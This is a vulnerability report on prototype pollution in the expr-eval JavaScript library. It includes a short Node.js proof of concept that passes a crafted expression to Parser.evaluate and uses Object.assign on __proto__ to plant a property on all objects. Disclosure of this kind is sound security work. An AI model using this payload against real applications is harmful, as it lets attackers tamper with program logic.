Prototype Pollution in silentmatt/expr-eval

Valid

Reported on

Mar 26th 2021


✍️ Description

With speficific input attckers can define properties on prototype, which will lead to prototype pollution.

Need node version>=12.0.0, which introduce Object.fromEntries

🕵️‍♂️ Proof of Concept

// PoC.js
const { Parser } = require('expr-eval');
const o = {};
console.log("o.a=", o.a); // o.a= undefined
const res = Parser.evaluate('Object=constructor;a=Object.fromEntries([["a","polluted"]]);Object.assign(__proto__, a)');
console.log("o.a=", o.a); // o.a= polluted

💥 Impact

This vulnerability is capable of make a prototype pollution

to join this conversation